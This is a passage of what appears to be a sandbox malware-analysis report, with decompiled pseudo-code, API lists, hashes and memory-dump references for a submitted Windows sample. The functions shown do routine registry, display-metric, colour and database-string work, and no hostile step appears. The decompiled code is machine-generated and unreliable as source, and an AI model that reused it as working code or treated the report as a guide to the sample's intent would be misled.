                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407412
                                                                              • VariantClear.OLEAUT32(?), ref: 00407426
                                                                              Strings
                                                                              • select * from Employees, xrefs: 004073CD
                                                                              • DRIVER={Microsoft Access Driver (*.mdb)};UID=admin;DBQ=ab.mdb;pwd= x;, xrefs: 00407399
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearH_prologVariant$ByteCharCreateInitializeInstanceMultiWidelstrlen
                                                                              • String ID: DRIVER={Microsoft Access Driver (*.mdb)};UID=admin;DBQ=ab.mdb;pwd= x;$select * from Employees
                                                                              • API String ID: 3912264618-3282461135
                                                                              • Opcode ID: 3ac2a3df578e013ff68d09e7b8251b3a1f1c6b42d2216e3b047b35a738743346
                                                                              • Instruction ID: f27dd1b74bafac8b90960d19ba72acee16fef208574680e4330fb597fe6c53cb
                                                                              • Opcode Fuzzy Hash: 3ac2a3df578e013ff68d09e7b8251b3a1f1c6b42d2216e3b047b35a738743346
                                                                              • Instruction Fuzzy Hash: 72218671D01108AADB05E7A5C946BEEBBB99F54708F20406EE005B31C2DAB81F0587AA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DA8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042DA8D(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                              0x0042daa8
                                                                              0x0042daaf
                                                                              0x0042dab2
                                                                              0x0042dab5
                                                                              0x0042dab8
                                                                              0x0042dac3
                                                                              0x0042dafa
                                                                              0x0042dafa
                                                                              0x0042db05
                                                                              0x0042db0a
                                                                              0x0042db0a
                                                                              0x0042db0f
                                                                              0x0042db14
                                                                              0x0042db14
                                                                              0x0042db1d

                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 0042DABB
                                                                              • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042DADE
                                                                              • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042DAFA
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042DB0A
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042DB14
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreate$Open
                                                                              • String ID: software
                                                                              • API String ID: 1740278721-2010147023
                                                                              • Opcode ID: b7a42afbcb34ec79f36ee597c1f33b52f4541bd785ce39960d6878fdf435229d
                                                                              • Instruction ID: 4ee22ab72d24d09348f149714e63517df5d5f11a14ade9983ccd04d75f93fc96
                                                                              • Opcode Fuzzy Hash: b7a42afbcb34ec79f36ee597c1f33b52f4541bd785ce39960d6878fdf435229d
                                                                              • Instruction Fuzzy Hash: CE110A72D00158FBDB21DF9ADD84DDFFFBCEF85704B1040AAA500A2111D3B1AA04DBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00409286, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E00409286(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E004090D5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x459e20(_a4, _a8);
			}







                                                                              0x00409293
                                                                              0x004092ac
                                                                              0x00409313
                                                                              0x00409313
                                                                              0x00409315
                                                                              0x00000000
                                                                              0x00409316
                                                                              0x004092ae
                                                                              0x004092b5
                                                                              0x00000000
                                                                              0x004092ce
                                                                              0x004092cf
                                                                              0x004092d2
                                                                              0x004092e0
                                                                              0x004092e3
                                                                              0x004092eb
                                                                              0x004092ec
                                                                              0x004092ed
                                                                              0x004092ee
                                                                              0x004092f5
                                                                              0x004092f8
                                                                              0x004092fc
                                                                              0x00409309
                                                                              0x00409309
                                                                              0x0040930f
                                                                              0x00000000
                                                                              0x0040930f
                                                                              0x004092b5
                                                                              0x00000000

                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004092C4
                                                                              • GetSystemMetrics.USER32 ref: 004092DC
                                                                              • GetSystemMetrics.USER32 ref: 004092E3
                                                                              • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00409309
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                              • String ID: B$DISPLAY
                                                                              • API String ID: 2307409384-3316187204
                                                                              • Opcode ID: 2d623e82beffbccdb7c4101a6abd0e9f4ed7abb956328d8292387862a8d20a1b
                                                                              • Instruction ID: 03c86ae7b3915281e7d1f590234124227337600624625df3b521cb5599ec9481
                                                                              • Opcode Fuzzy Hash: 2d623e82beffbccdb7c4101a6abd0e9f4ed7abb956328d8292387862a8d20a1b
                                                                              • Instruction Fuzzy Hash: A111A371601224EBCF219F64DC84A5BBBA8EF49751B008072FC05BA1D6C2B9DD01CFA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428B87, Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00428B87(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                              0x00428b91
                                                                              0x00428b97
                                                                              0x00428b9e
                                                                              0x00428ba5
                                                                              0x00428bac
                                                                              0x00428bb9
                                                                              0x00428bc0
                                                                              0x00428bc3
                                                                              0x00428bc6
                                                                              0x00428bca

                                                                              APIs
                                                                              • GetSysColor.USER32(0000000F), ref: 00428B93
                                                                              • GetSysColor.USER32(00000010), ref: 00428B9A
                                                                              • GetSysColor.USER32(00000014), ref: 00428BA1
                                                                              • GetSysColor.USER32(00000012), ref: 00428BA8
                                                                              • GetSysColor.USER32(00000006), ref: 00428BAF
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00428BBC
                                                                              • GetSysColorBrush.USER32(00000006), ref: 00428BC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Brush
                                                                              • String ID:
                                                                              • API String ID: 2798902688-0
                                                                              • Opcode ID: a19c6dd821970c4584db9dd8733942771fc38e351c1d522927b3d658aa7fd6f2
                                                                              • Instruction ID: 70cba862a80adb0bed28b41b8c2963372d46e51a90eda20a743410cf0b67a23e
                                                                              • Opcode Fuzzy Hash: a19c6dd821970c4584db9dd8733942771fc38e351c1d522927b3d658aa7fd6f2
                                                                              • Instruction Fuzzy Hash: BAF0F8719407489BD730BBB29D09B47BAE1EFC4B10F02192AD2818BA90E6B6E0409F44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C258, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042C258() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x45a370 =  *0x45a370 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x45a370 = _t6;
					return _t6;
				}
			}





                                                                              0x0042c269
                                                                              0x0042c273
                                                                              0x0042c277
                                                                              0x0042c293
                                                                              0x0042c293
                                                                              0x00000000
                                                                              0x0042c293
                                                                              0x0042c279
                                                                              0x0042c27f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c281
                                                                              0x0042c281
                                                                              0x0042c286
                                                                              0x0042c28c
                                                                              0x00000000
                                                                              0x0042c28c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Version$MessageRegisterWindow
                                                                              • String ID: MSWHEEL_ROLLMSG
                                                                              • API String ID: 303823969-2485103130
                                                                              • Opcode ID: 4046f56fa4d78d7e5a9d89c34266bd5c8eda0f22f934f8979b7f3b537493b9b2
                                                                              • Instruction ID: 1f6d470c0d54ed8debbc4a9dad43178b17367c804212208b4abd6f476afa8102
                                                                              • Opcode Fuzzy Hash: 4046f56fa4d78d7e5a9d89c34266bd5c8eda0f22f934f8979b7f3b537493b9b2
                                                                              • Instruction Fuzzy Hash: 85E08039D40233C6D71127F8BD4035E26945B59351F9141F7DD00432545F7C484346BE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00410097, Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E00410097(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E004128A0(E004312D8, _t327);
				_t155 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E0041162C(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E0040DC9A( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E0040C98C(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E0041163F( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E0040DA18(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x44b030;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E00411612(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E0040DA42(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E0040C8D0(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E00411612(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E0040DA42(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E0040C931( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E00411612(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E0040DA6C(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E0040DC02(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E00411612(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E0040830B(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E0041165F(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E00411612(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E0041155B(_t327 - 0x100,  *((short*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E00411612(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E0041163F(_t327 - 0xf0, E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E00411612(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E00411612(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E0040FB03(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E0041165F(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E00411612(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E00401000(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E0041155B(_t327 - 0x110,  *((short*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E00411612(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E00411582(_t327 - 0xe0,  *((intOrPtr*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E00411612(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E00411612(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E00411612(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E00411612(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E00411612(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E0041163F( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E00412FBB( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}



































                                                                              0x00410097
                                                                              0x0041009c
                                                                              0x004100a7
                                                                              0x004100ae
                                                                              0x004100ba
                                                                              0x004100bd
                                                                              0x004100c2
                                                                              0x004100ce
                                                                              0x004100d1
                                                                              0x004100d6
                                                                              0x004100da
                                                                              0x004100f5
                                                                              0x004100fe
                                                                              0x00410109
                                                                              0x00410109
                                                                              0x0041010d
                                                                              0x00410118
                                                                              0x0041011a
                                                                              0x0041039b
                                                                              0x0041039b
                                                                              0x004103a0
                                                                              0x00000000
                                                                              0x004103a6
                                                                              0x004103a6
                                                                              0x004103a6
                                                                              0x004103a7
                                                                              0x004104fa
                                                                              0x004104ff
                                                                              0x00410501
                                                                              0x00410507
                                                                              0x0041050a
                                                                              0x0041050d
                                                                              0x0041050f
                                                                              0x0041050f
                                                                              0x0041050f
                                                                              0x0041050f
                                                                              0x00410512
                                                                              0x00410512
                                                                              0x0041050f
                                                                              0x0041051a
                                                                              0x0041051d
                                                                              0x0041051f
                                                                              0x00410521
                                                                              0x00410523
                                                                              0x00410523
                                                                              0x00410525
                                                                              0x00410528
                                                                              0x00410535
                                                                              0x00410539
                                                                              0x0041053e
                                                                              0x00000000
                                                                              0x0041053e
                                                                              0x004103ad
                                                                              0x004103ae
                                                                              0x004103ae
                                                                              0x004103af
                                                                              0x0041049e
                                                                              0x004104a3
                                                                              0x004104a5
                                                                              0x004104af
                                                                              0x004104b5
                                                                              0x004104c5
                                                                              0x004104c8
                                                                              0x004104cd
                                                                              0x004104d6
                                                                              0x004104e0
                                                                              0x004104e4
                                                                              0x004104e9
                                                                              0x00000000
                                                                              0x004104e9
                                                                              0x004103b5
                                                                              0x004103b5
                                                                              0x004103b5
                                                                              0x004103b6
                                                                              0x0041043c
                                                                              0x00410441
                                                                              0x00410443
                                                                              0x0041044d
                                                                              0x00410450
                                                                              0x00410460
                                                                              0x00410463
                                                                              0x00410468
                                                                              0x00410474
                                                                              0x00410484
                                                                              0x00410488
                                                                              0x0041048d
                                                                              0x00000000
                                                                              0x0041048d
                                                                              0x004103b8
                                                                              0x004103b8
                                                                              0x004103b9
                                                                              0x004103c8
                                                                              0x004103cd
                                                                              0x004103cf
                                                                              0x004103f9
                                                                              0x004103fe
                                                                              0x00410409
                                                                              0x00410419
                                                                              0x0041041d
                                                                              0x00410422
                                                                              0x00000000
                                                                              0x00410422
                                                                              0x004103cf
                                                                              0x004103b9
                                                                              0x004103b6
                                                                              0x004103af
                                                                              0x004103a7
                                                                              0x00410120
                                                                              0x00410120
                                                                              0x00410364
                                                                              0x00410374
                                                                              0x00410378
                                                                              0x00410381
                                                                              0x00410385
                                                                              0x00410391
                                                                              0x00410393
                                                                              0x00000000
                                                                              0x00410126
                                                                              0x00410126
                                                                              0x00410129
                                                                              0x00410236
                                                                              0x00410239
                                                                              0x00410339
                                                                              0x00410342
                                                                              0x00410346
                                                                              0x0041034b
                                                                              0x00000000
                                                                              0x0041023f
                                                                              0x0041023f
                                                                              0x00410242
                                                                              0x00410306
                                                                              0x0041030f
                                                                              0x00410313
                                                                              0x00410318
                                                                              0x00000000
                                                                              0x00410248
                                                                              0x00410248
                                                                              0x0041024b
                                                                              0x00410251
                                                                              0x00410254
                                                                              0x004102cd
                                                                              0x004102d4
                                                                              0x004102da
                                                                              0x004102e4
                                                                              0x004102e8
                                                                              0x004102ed
                                                                              0x00000000
                                                                              0x00410256
                                                                              0x00410256
                                                                              0x00410259
                                                                              0x00000000
                                                                              0x0041025b
                                                                              0x0041025b
                                                                              0x0041025e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041025e
                                                                              0x00410259
                                                                              0x00410254
                                                                              0x0041024b
                                                                              0x00410242
                                                                              0x0041012f
                                                                              0x0041012f
                                                                              0x00410546
                                                                              0x00410554
                                                                              0x00410564
                                                                              0x00410568
                                                                              0x00410571
                                                                              0x00410575
                                                                              0x00410581
                                                                              0x00410583
                                                                              0x00410586
                                                                              0x00410586
                                                                              0x00410589
                                                                              0x0041058c
                                                                              0x00410135
                                                                              0x00410136
                                                                              0x00410136
                                                                              0x00410137
                                                                              0x00410295
                                                                              0x004102ab
                                                                              0x004102b4
                                                                              0x004102b8
                                                                              0x004102bd
                                                                              0x00000000
                                                                              0x0041013d
                                                                              0x0041013d
                                                                              0x0041013d
                                                                              0x0041013e
                                                                              0x00410264
                                                                              0x00410278
